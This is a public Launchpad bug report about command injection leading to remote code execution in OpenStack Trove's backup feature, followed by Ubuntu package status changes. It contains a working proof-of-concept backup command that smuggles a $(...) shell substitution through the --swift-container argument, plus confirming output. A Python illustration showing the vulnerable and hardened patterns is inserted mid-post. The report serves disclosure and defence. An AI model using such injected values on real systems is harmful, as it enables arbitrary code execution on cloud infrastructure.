[Bug 2028680] [NEW] Remote code execution: Trove backup
Corey Bryant
2028680 at bugs.launchpad.net
Tue Jul 25 15:07:23 UTC 2023
Public bug reported:
Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004
An external security audit by Adam Bell, CyberCX New Zealand (conducted
for Catalyst Cloud) has identified a Remote Code Execution security
issue in Trove.
During a Trove instance backup command, it is possible to pass extra
arguments through the guestagent to docker and, because the backup Python
code runs them through a subprocess shell, perform Remote Code Execution
within the Trove backup container.
Replication steps:
1) Create a MySQL database instance.
2) Issue a backup command using the following:
$ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1
Validation of the RCE can be observed from within the Trove VM:
root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell actions,
including apt.
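The two ingredients the report names (user input interpolated into a shell command string, and the extra tokens the shell then splits off as arguments) are easy to see side by side. The following is an added illustration, not Trove's own code: the backup tool path, option names and the container-name rule are assumptions, and the container value is the one from the report above.

```python
import re
import shlex
import subprocess

# Hypothetical rule: a Swift container name must be one plain token.
# Shell metacharacters, quotes and whitespace are rejected before use.
CONTAINER_RE = re.compile(r"^[A-Za-z0-9._-]{1,255}$")

# Value from the report; constructed here purely to exercise the code paths.
REPORTED_CONTAINER = 'test --db-user="$(touch /rce_successful.txt)"'


def validate_container(name: str) -> str:
    if not CONTAINER_RE.fullmatch(name):
        raise ValueError(f"invalid swift container name: {name!r}")
    return name


def vulnerable_backup_cmd(container: str, backup_id: str) -> str:
    # Vulnerable pattern: the caller's value is spliced into one shell
    # string (hypothetical tool path). A shell then re-parses it, so a
    # space yields extra options and $(...) is expanded before the tool runs.
    return (f"/usr/local/bin/backup --swift-container {container} "
            f"--backup-id {backup_id}")


def shell_argv(cmd: str) -> list:
    # What the shell hands to the tool after quote removal and word
    # splitting (shlex does not perform command substitution, so the
    # $(...) text is shown as-is rather than executed).
    return shlex.split(cmd)


def hardened_backup_cmd(container: str, backup_id: str) -> list:
    # Hardened pattern: validate the value, then build an argv list.
    # Executed with shell=False, the value reaches the tool as exactly
    # one argument no matter what characters it contains.
    return ["/usr/local/bin/backup",
            "--swift-container", validate_container(container),
            "--backup-id", backup_id]


def run_hardened(container: str, backup_id: str) -> subprocess.CompletedProcess:
    # shell=False: no shell is involved, so no re-parsing or expansion.
    return subprocess.run(hardened_backup_cmd(container, backup_id),
                          shell=False, check=True, capture_output=True)
```

`shell_argv(vulnerable_backup_cmd(REPORTED_CONTAINER, "b1"))` shows the smuggled `--db-user=...` token arriving as a separate argument, while `hardened_backup_cmd` refuses the same value outright.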
** Affects: openstack-trove (Ubuntu)
Importance: High
Status: Fix Released
** Affects: openstack-trove (Ubuntu Jammy)
Importance: High
Status: Triaged
** Affects: openstack-trove (Ubuntu Lunar)
Importance: High
Status: Fix Released
** Affects: openstack-trove (Ubuntu Mantic)
Importance: High
Status: Fix Released
** Also affects: openstack-trove (Ubuntu Mantic)
Importance: Undecided
Status: New
** Also affects: openstack-trove (Ubuntu Lunar)
Importance: Undecided
Status: New
** Also affects: openstack-trove (Ubuntu Jammy)
Importance: Undecided
Status: New
** Changed in: openstack-trove (Ubuntu Lunar)
Status: New => Fix Released
** Changed in: openstack-trove (Ubuntu Mantic)
Status: New => Fix Released
** Changed in: openstack-trove (Ubuntu Jammy)
Status: New => Triaged
** Changed in: openstack-trove (Ubuntu Jammy)
Importance: Undecided => High
** Changed in: openstack-trove (Ubuntu Lunar)
Importance: Undecided => High
** Changed in: openstack-trove (Ubuntu Mantic)
Importance: Undecided => High
https://bugs.launchpad.net/bugs/2028680